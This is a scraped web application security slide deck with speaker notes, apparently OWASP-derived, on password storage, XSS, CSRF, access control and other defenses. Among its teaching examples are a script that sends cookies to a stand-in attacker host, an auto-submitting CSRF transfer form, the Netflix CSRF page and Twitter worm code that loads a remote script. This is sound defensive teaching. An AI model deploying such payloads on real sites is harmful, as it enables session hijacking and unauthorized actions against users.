    [2] Password Defenses Disable BrowserAutocomplete <form AUTOCOMPLETE="off"> <input AUTOCOMPLETE="off"> Only send passwords over HTTPS POST Do not display passwords in browser Input type=password Store password based on need Use a salt (de-duplication) SCRYPT/PBKDF2 (slow, performance hit, easy) HMAC (requires good key storage, tough)
  • 15.
    Password Storage inthe Real World 1) Do not limit the type of characters or length of user password • Limiting passwords to protect against injection is doomed to failure • Use proper encoder and other defenses described instead
  • 16.
    Password Storage inthe Real World 2) Use a cryptographically strong credential-specific salt •protect( [salt] + [password] ); •Use a 32char or 64char salt (actual size dependent on protection function); •Do not depend on hiding, splitting, or otherwise obscuring the salt
  • 17.
    Leverage Keyed Functions 3a)Impose difficult verification on [only] the attacker (strong/fast) •HMAC-SHA-256( [private key], [salt] + [password] ) •Protect this key as any private key using best practices •Store the key outside the credential store •Upholding security improvement over (solely) salted schemes relies on proper key creation and management
  • 18.
    Password Storage inthe Real World 3b) Impose difficult verification on the attacker and defender (weak/slow) •pbkdf2([salt] + [password], c=10,000,000); •PBKDF2 when FIPS certification or enterprise support on many platforms is required •Scrypt where resisting any/all hardware accelerated attacks is necessary but support isn’t.
  • 19.
    [3] Multi Factor Authentication Google,Facebook, PayPal, Apple, AWS, Dropbox, Twitter Blizzard's Battle.Net, Valve's Steam, Yahoo
  • 20.
    Basic MFA Considerations •Where do you send the token? – Email (worst) – SMS (ok) – Mobile native app (good) – Dedicated token (great) – Printed Tokens (interesting) • How do you handle thick clients? – Email services, for example – Dedicated and strong per-app passwords 20
  • 21.
    Basic MFA Considerations •How do you handle unavailable MFA devices? – Printed back-up codes – Fallback mechanism (like email) – Call in center • How do you handle mobile apps? – When is MFA not useful in mobile app scenarios? 21
  • 22.
    Forgot Password SecureDesign Require identity questions Last name, account number, email, DOB Enforce lockout policy Ask one or more good security questions https://www.owasp.org/index.php/Choosing_and_Using_Security_ Questions_Cheat_Sheet Send the user a randomly generated token via out-of-band email, SMS or token Verify code in same web session Enforce lockout policy Change password Enforce password policy
  • 23.
    [4] Anatomy of aXSS Attack <script > var badURL=‘https://evileviljim.com/somesit e/data=‘ + document.cookie; var img = new Image(); img.src = badURL; </script> <script>document.body.innerHTML=‘<blink >CYBER IS COOL</blink>’;</script>
  • 24.
    Contextual Output Encoding (XSSDefense) – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
  • 25.
    XSS Defense byData Type and Context Data Type Context Defense String HTML Body HTML Entity Encode String HTML Attribute Minimal Attribute Encoding String GET Parameter URL Encoding String Untrusted URL URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification String CSS Strict structural validation, CSS Hex encoding, good design HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer) Any DOM DOM XSS Cheat Sheet Untrusted JavaScript Any Sandboxing JSON Client Parse Time JSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
  • 26.
  • 27.
  • 28.
    OWASP Java EncoderProject https://www.owasp.org/index.php/OWASP_Java_Encoder_Project • No third party libraries or configuration necessary • This code was designed for high-availability/highperformance encoding functionality • Simple drop-in encoding functionality • Redesigned for performance • More complete API (uri and uri component encoding, etc) in some regards. • Java 1.5+ • Last updated February 14, 2013 (version 1.1)
  • 29.
    OWASP Java EncoderProject https://www.owasp.org/index.php/OWASP_Java_Encoder_Project The Problem The Problem Web Page built in Java JSP is vulnerable to XSS Web Page built in Java JSP is vulnerable to XSS The Solution The Solution 1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" /> 1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" /> 2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" /> 2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" /> 3) <button 3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> click me click me </button> </button> 4) <script type="text/javascript"> 4) <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(message) %>"; var msg = "<%= Encode.forJavaScriptBlock(message) %>"; alert(msg); alert(msg); </script> </script>
  • 30.
    OWASP Java EncoderProject https://www.owasp.org/index.php/OWASP_Java_Encoder_Project HTML Contexts Encode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute (String) XML Contexts Encode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String) CSS Contexts Encode#forCssString(String) Encode#forCssUrl(String) JavaScript Contexts Encode#forJavaScript(String) Encode#forJavaScriptAttribute(String) Encode#forJavaScriptBlock(String) Encode#forJavaScriptSource(String) URI/URL contexts Encode#forUri(String) Encode#forUriComponent(String)
  • 31.
    OWASP Java EncoderProject https://www.owasp.org/index.php/OWASP_Java_Encoder_Project <script src="/my-server-side-generated-script"> <script src="/my-server-side-generated-script"> class MyServerSideGeneratedScript extends HttpServlet {{ class MyServerSideGeneratedScript extends HttpServlet void doGet(blah) {{ void doGet(blah) response.setContentType("text/javascript; charset=UTF-8"); response.setContentType("text/javascript; charset=UTF-8"); PrintWriter w = response.getWriter(); w.println("function() {"); PrintWriter w = response.getWriter(); w.println("function() {"); w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');"); "');"); w.println("}"); w.println("}"); }} }}
  • 32.
    Other Encoding Libraries •Ruby on Rails – http://api.rubyonrails.org/classes/ERB/Util.html • Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP – https://www.owasp.org/index.php/ Category:OWASP_Encoding_Project • ESAPI – PHP.NET, Python, Classic ASP, Cold Fusion – https://www.owasp.org/index.php/ Category:OWASP_Enterprise_Security_API • .NET AntiXSS Library – http://wpl.codeplex.com/releases/view/80289
  • 34.
    OWASP HTML SanitizerProject https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project • HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS. • This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-htmlsanitizer/wiki/AttackReviewGroundRules. • Very easy to use. • It allows for simple programmatic POSITIVE policy configuration. No XML config. • Actively maintained by Mike Samuel from Google's AppSec team! • This is code from the Caja project that was donated by Google. It is rather high performance and low memory utilization. OWASP
  • 35.
    Solving Real WorldProblems with the OWASP HTML Sanitizer Project The Problem The Problem Web Page is vulnerable to XSS because of untrusted HTML Web Page is vulnerable to XSS because of untrusted HTML The Solution The Solution PolicyFactory policy = new HtmlPolicyBuilder() PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowElements("a") .allowUrlProtocols("https") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .requireRelNofollowOnLinks() .build(); .build(); String safeHTML = policy.sanitize(untrustedHTML); String safeHTML = policy.sanitize(untrustedHTML);
  • 36.
    Other HTML Sanitizers •Pure JavaScript – http://code.google.com/p/googlecaja/wiki/JsHtmlSanitizer • Python – https://pypi.python.org/pypi/bleach • PHP – http://htmlpurifier.org/ – http://www.bioinformatics.org/phplabware/internal_u tilities/htmLawed/ • .NET – AntiXSS.getSafeHTML/getSafeHTMLFragment – http://htmlagilitypack.codeplex.com/ • Ruby on Rails – http://api.rubyonrails.org/classes/HTML.html
  • 37.
    DOM-Based XSS Defense •JavaScript encode and delimit untrusted data as quoted strings • Avoid use of HTML rendering methods like innerHTML – If you must do this, then sanitize untrusted HTML first • Avoid code execution contexts – eval(), setTimeout() or event handlers • When possible, treat untrusted data as display text only • Use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…), etc. to build dynamic interfaces • Parse JSON with JSON.parse in the browser
  • 38.
     SAFE use ofJQuery $(‘#element’).text(UNTRUSTED DATA);  UNSAFE use of JQuery  $(‘#element’).html(UNTRUSTED DATA); 
  • 39.
    Dangerous jQuery 1.7.2Data Types CSS Some Attribute Settings HTML URL (Potential Redirect) jQuery methods that directly update DOM or can execute JavaScript $() or jQuery() .attr() .add() .css() .after() .html() .animate() .insertAfter() .append() .insertBefore() .appendTo() Note: .text() updates DOM, but is safe. jQuery methods that accept URLs to potentially unsafe content jQuery.ajax() jQuery.post() jQuery.get() load() jQuery.getScript() 39
  • 40.
    Content Security Policy •Anti-XSS W3C standard http://www.w3.org/TR/CSP/ • Move all inline script and style into external scripts • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use - Firefox/IE10PR: X-Content-Security-Policy - Chrome Experimental: X-WebKit-CSP - Content-Security-Policy-Report-Only • Define a policy for the site regarding loading of content
  • 41.
    [5] Cross Site RequestForgery Defense <img src="https://google.com/logo.png"> <img src="https://google.com/deleteMail/7/confirm=true"> <form method="POST" action="https://mybank.com/transfer"> <input type="hidden" name="account" value="23532632"/> <input type="hidden" name="amount" value="1000"/> </form> <script>document.forms[0].submit()</script>
  • 42.
    Real World CSRF– Netflix (2008) <html> <head> <script language="JavaScript" type="text/javascript"> function load_image2() { var img2 = new Image(); img2.src="http://www.netflix.com/MoveToTop?movieid=70110672&fromq=true"; } </script> </head> <body> <img src="http://www.netflix.com/JSON/AddToQueue?movieid=70110672" width="1" height="1" border="0"> <script>setTimeout( 'load_image2()', 2000 );</script> </body> </html>
  • 43.
    Twitter XSS/CSRF WormCode (2010) var content = document.documentElement.innerHTML; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g); var authtoken = authreg.exec(content);authtoken = authtoken[1]; //alert(authtoken); var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a '); var ajaxConn = new XHConn();ajaxConn.connect("/status/update","POST”,"authenticit y_token=" + authtoken+"&status=" + updateEncode + "&tab=home&update=update"); var ajaxConn1 = new XHConn(); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+ authtoken+"&user[url]="+xss+"&tab=home&update=update");
  • 44.
  • 45.
    CSRF Tokens andRe-authentication – Cryptographic Tokens • Primary and most powerful defense • XSS Defense Required – Require users to re-authenticate
  • 46.
  • 47.
    [6] Controlling Access if ((user.isManager()|| user.isAdministrator() || user.isEditor()) && (user.id() != 1132)) { //execute action } How do you change the policy of this code?
  • 48.
    Apache SHIRO http://shiro.apache.org/ • ApacheShiro is a powerful and easy to use Java security framework. • Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management. • Built on sound interface-driven design and OO principles. • Enables custom behavior. • Sensible and secure defaults for everything.
  • 49.
    Solving Real WorldAccess Control Problems with the Apache Shiro The Problem The Problem Web Application needs secure access control mechanism Web Application needs secure access control mechanism The Solution The Solution if ( currentUser.isPermitted( "lightsaber:wield" ) ) { if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely."); log.info("You may use a lightsaber ring. Use it wisely."); } else { } else { log.info("Sorry, lightsaber rings are for schwartz masters only."); log.info("Sorry, lightsaber rings are for schwartz masters only."); } }
  • 50.
    Solving Real WorldAccess Control Problems with the Apache Shiro The Problem The Problem Web Application needs to secure access to aaspecific object Web Application needs to secure access to specific object The Solution The Solution int winnebagoId = request.getInt("winnebago_id"); int winnebagoId = request.getInt("winnebago_id"); if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys."); } else { } else { log.info("Sorry, you aren't allowed to drive this winnebago!"); log.info("Sorry, you aren't allowed to drive this winnebago!"); } }
  • 51.
  • 58.
    X-Frame-Options // to preventall framing of this content response.addHeader( "X-FRAME-OPTIONS", "DENY" ); // to allow framing of this content only by this site response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" ); // to allow framing from a specific domain response.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
  • 59.
    Legacy Browser ClickjackingDefense <style id="antiCJ">body{display:none !important;}</style> <script type="text/javascript"> if (self === top) { var antiClickjack = document.getElementByID("antiCJ"); antiClickjack.parentNode.removeChild(antiClickjack) } else { top.location = self.location; } </script>
  • 60.
    [8] App Layer IntrusionDetection • Great detection points to start with – Input validation failure server side when client side validation exists – Input validation failure server side on non-user editable parameters such as hidden fields, checkboxes, radio buttons or select lists – Forced browsing to common attack entry points (e.g. /admin/secretlogin.jsp) or honeypot URL (e.g. a fake path listed in /robots.txt)
  • 61.
    App Layer IntrusionDetection • Others – Blatant SQLi or XSS injection attacks – Workflow sequence abuse (e.g. multi-part form in wrong order) – Custom business logic (e.g. basket vs catalogue price mismatch)
  • 62.
    OWASP AppSensor (Java) •Project and mailing list https://www.owasp.org/index.php/OWASP_ AppSensor_Project • Four-page briefing, Crosstalk, Journal of Defense Software Engineering • http://www.crosstalkonline.org/storage/issue -archives/2011/201109/201109-Watson.pdf
  • 63.
    [9] Encryption in Transit(HTTPS/TLS) • Confidentiality, Integrity (in Transit) and Authenticity – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL – Starting when the login form is rendered until logout is complete • HTTPS configuration best practices – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Shee t • HSTS (Strict Transport Security) – http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000 • Certificate Pinning – https://www.owasp.org/index.php/Pinning_Cheat_Sheet
  • 64.
    Certificate Pinning • Whatis Pinning – Pinning is a key continuity scheme – Detect when an imposter with a fake but CA validated certificate attempts to act like the real server • 2 Types of pinning – Carry around a copy of the server’s public key; – Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance • Note of the server’s public key on first use (Trust-on-FirstUse, Tofu) – Useful when no a priori knowledge exists, such as SSH or a Browser • https://www.owasp.org/index.php/Pinning_Cheat_Sheet
  • 65.
    [10] • • • • • File Upload Security UploadVerification – Filename and Size validation + antivirus Upload Storage – Use only trusted filenames + separate domain Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml". Image Upload Verification – Enforce proper image size limits – Use image rewriting libraries – Set the extension of the stored image to be a valid image extension – Ensure the detected content type of the image is safe Generic Upload Verification – Ensure decompressed size of file < maximum size – Ensure that an uploaded archive matches the type expected (zip, rar) – Ensure structured uploads such as an add-on follow proper standard
  • 66.
    How I learnedto stop worrying and love the WAF
  • 67.
    [11] Virtual Patching “A securitypolicy enforcement layer which prevents the exploitation of a known vulnerability”
  • 68.
    Virtual Patching Rationale forUsage – No Source Code Access – No Access to Developers – High Cost/Time to Fix Benefit – Reduce Time-to-Fix – Reduce Attack Surface
  • 69.
    OWASP ModSecurity CoreRule Set http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
  • 70.

Editor's Notes

  • #10 Other problems : what else is wrong with this code?
  • #12 6/3/2012 CVE-2012-2660/2661/2694 Active record 3.0 and later for Ruby on Rails is vuln to Fixed in RoR 3.2.5, 3.1.5, 3.0.13 Rails 2.3.x is vilnerable to various injections that have NOT been patched and will N:OT be patched so please don’t use it **** 1/3/2013 http://lwn.net/Articles/531267/ An SQL injection vulnerability in all Ruby on Rails releases has been disclosed. &quot;Due to the way dynamic finders in Active Record extract options from method parameters, a method parameter can mistakenly be used as a scope. Carefully crafted requests can use the scope to inject arbitrary SQL.&quot; Fixed in 3.2.10, 3.1.9, and 3.0.18 releases.
  • #16 Guidance   Do not defeat users’ attempts to secure their credentialslimit type of characters or length of user passwords Some organizations restrict the 1) types of special characters and 2) length of credentials accepted by systems because of their inability to prevent SQL Injection, Cross-site scripting, and analogous command-injection attacks. However, secure password storage mechanisms possess design elements that prevent length, constituency, and even encoding from subverting system security. Do not apply length, character set, or encoding restrictions on the entry or storage of credentials. Continue applying encoding, escaping, masking, outright omission, and other best practices to rendering this information when applicable.   
  • #17 Salts serve two purposes: De-duplicate protected output of identical credentials and Augment entropy fed to protecting function without relying on credential complexity. The second aims to make pre-computed lookup attacks [*2] on an individual credential and time-based attacks on a population intractable.
  • #18 HMACs inherit properties of hash functions including their speed, allowing for near instant verification. Key size imposes intractable size- and/or space- requirements on compromise--even for common credentials (aka password = ‘password’). Designers protecting stored credentials with keyed functions:   Use a single “site-wide” key;   Protect this key as any private key using best practices; Store the key outside the credential store (aka: not in the database); Generate the key using cryptographically-strong pseudo-random data; Do not worry about output block size (i.e. SHA-256 vs. SHA-512). Example protect() pseudo-code follows: return [salt] + HMAC-SHA-256([key], [salt] + [credential]);   Upholding security improvement over (solely) salted schemes relies on proper key management.   Design protection/verification for compromise The frequency and ease with which threats steal protected credentials demands “design for failure”. having detected theft, a credential storage scheme must support continued operation by marking credential data compromised and engaging alternative credential validation workflows as follows:   Protect the user’s account Invalidate authN ‘shortcuts’ disallowing login without 2nd factors or secret questions Disallow changes to account (secret questions, out of band exchange channel setup/selection, etc.) Load &amp; use new protection scheme Load a new (stronger) protect(credential) function Include version information stored with form Set ‘tainted’/‘compromised’ bit until user resets credentials Rotate any keys and/or adjust protection function parameters (iter count) Increment scheme version number When user logs in: Validate credentials based on stored version (old or new); if old demand 2nd factor or secret answers Prompt user for credential change, apologize, &amp; conduct OOB confirmation Convert stored credentials to new scheme as user successfully log in   Supporting workflow outlined above requires tight integration with Authentication frameworks and workflows. http://www.tarsnap.com/scrypt/scrypt.pdf  
  • #19 Impose intractable verification on [only] attacker The function used to protect stored credentials should balance between A) acceptable response time for verification of users’ credentials during peak use while B) placing time required to map &lt;credential&gt; → &lt;protected form&gt;  beyond threats’ hardware (GPU, FPGA) and technique (dictionary-based, brute force, etc) capabilities. Two approaches facilitate this, each imperfectly. Leverage an adaptive one-way function - Adaptive one-way functions compute a one-way (irreversible) transform. Each function allows configuration of ‘work factor’. Underlying mechanisms used to achieve irreversibility and govern work factors (such as time, space, and parallelism) vary between functions and remain unimportant to this discussion. Select:   PBKDF2 [*4] when FIPS certification or enterprise support on many platforms is required; Scrypt [*5] where resisting any/all hardware accelerated attacks is necessary but support isn’t. Example protect() pseudo-code follows: return [salt] + pbkdf2([salt], [credential], c=10000);   Designers select one-way adaptive functions to implement protect() because these functions can be configured to cost (linearly or exponentially) more than a hash function to execute. Defenders adjust work factor to keep pace with threats’ increasing hardware capabilities. Those implementing adaptive one-way functions must tune work factors so as to impede attackers while providing acceptable user experience and scale. Additionally, adaptive one-way functions do not effectively prevent reversal of common dictionary-based credentials (users with password ‘password’) regardless of user population size or salt usage.   Leverage Keyed functions - Keyed functions, such as HMACs, compute a one-way (irreversible) transform using a private key and given input. For example, HMACs inherit properties of hash functions including their speed, allowing for near instant verification. Key size imposes intractable size- and/or space- requirements on compromise--even for common credentials (aka password = ‘password’). Designers protecting stored credentials with keyed functions:   Use a single “site-wide” key;   Protect this key as any private key using best practices; Store the key outside the credential store (aka: not in the database); Generate the key using cryptographically-strong pseudo-random data; Do not worry about output block size (i.e. SHA-256 vs. SHA-512). Example protect() pseudo-code follows: return [salt] + HMAC-SHA-256([key], [salt] + [credential]);   Upholding security improvement over (solely) salted schemes relies on proper key management.   Design protection/verification for compromise The frequency and ease with which threats steal protected credentials demands “design for failure”. having detected theft, a credential storage scheme must support continued operation by marking credential data compromised and engaging alternative credential validation workflows as follows:   Protect the user’s account Invalidate authN ‘shortcuts’ disallowing login without 2nd factors or secret questions Disallow changes to account (secret questions, out of band exchange channel setup/selection, etc.) Load &amp; use new protection scheme Load a new (stronger) protect(credential) function Include version information stored with form Set ‘tainted’/‘compromised’ bit until user resets credentials Rotate any keys and/or adjust protection function parameters (iter count) Increment scheme version number When user logs in: Validate credentials based on stored version (old or new); if old demand 2nd factor or secret answers Prompt user for credential change, apologize, &amp; conduct OOB confirmation Convert stored credentials to new scheme as user successfully log in   Supporting workflow outlined above requires tight integration with Authentication frameworks and workflows. http://www.tarsnap.com/scrypt/scrypt.pdf  
  • #20 &gt; Also, SMS can be defeated a number of ways, fro SIM swop fraud &gt; (http://financialcryptography.com/mt/archives/001349.html), to Zitmo&apos;s &gt; patching at the kernel (SMS is sent/received via the socket API), to &gt; simply being the highest priority receiver and swallowing the SMS on &gt; Android (https://groups.google.com/d/msg/android-security-discuss/TURchbIN_LE/8x69SeMF7eQJ). So it reduces risk but is not full proof. Hi Jim, Below is the reference for the statement that US banks suffer fraud at 600x the rate of a DE bank. It&apos;s from Gutmann&apos;s Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf‎), page 542. The effect of different banks’ attitudes towards password security (and security in general) is shown in phishing loss figures, with losses in the UK, which has traditionally used straight passwords, being eight times higher than in Germany, which used to use TANs and has since moved on to even stronger measures. Similar sorts of figures are given in a comparison of US and Asian banks, who use (real) two-factor authentication, perform comprehensive analyses of electronic crime incidents, and in general are concerned about their reputation and image and are prepared to invest extra effort to protect them. For example one Japanese bank maintains multiple independent security-audit/assessment teams, often using two or more teams to check a particular system, with the different teams acting as a cross-check on each others’ performance. The bank’s security people plant known vulnerabilities in order to verify that their auditing teams are catching things, and rate each team’s performance against that of the others. At the end of the year the lowest-performing team for that year gets reassigned to other work, and new auditors/assessors are brought in to replace them. The losses due to electronic crime like phishing and malware for these banks is twenty-five times lower than for equivalent US banks [100]. In contrast in the US, where banks not only use straight passwords but as previous chapters have pointed out actively train their customers to become phishing victims, phishing losses are a staggering six hundred times higher than in Germany [101].
  • #31 HTML Contexts Encode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute(String) XML Contexts Encode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String) CSS Contexts Encode#forCssString(String) Encode#forCssUrl(String) JavaScript Contexts Encode#forJava(String) Encode#forJavaScript(String) Encode#forJavaScriptAttribute(String) JavaScript attribute Encode#forJavaScriptBlock(String) JavaScript block Encode#forJavaScriptSource(String) JavaScript source URI/URL contexts Encode#forUri(String) Encode#forUriComponent(String)
  • #37 http://wpl.codeplex.com/ Microsoft Web Protection Library
  • #38 Need to expand this section!
  • #39 Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8
  • #40 CREDIT THIS TO DAVE WICHERS. Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8
  • #60 Put this all in the HEAD tag
  • #65 Pinning is a key continuity scheme, and the idea is to either (1) carry around a copy of the server’s public key; or (2) note of the server’s public key on first use (Trust-on-First-Use, Tofu). The former is great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance. The latter is useful when no a priori knowledge exists, such as SSH or a Browser. Both detect the unexpected change that occurs when an imposter with a fake certificate attempts to act like the real server.   While you have a choice to pin the certificate or public key, it’s often best to pin the public key. That is because some companies, such as Google, rotate its certificate regularly (every 30 days or so) but re-certifies the inner public key.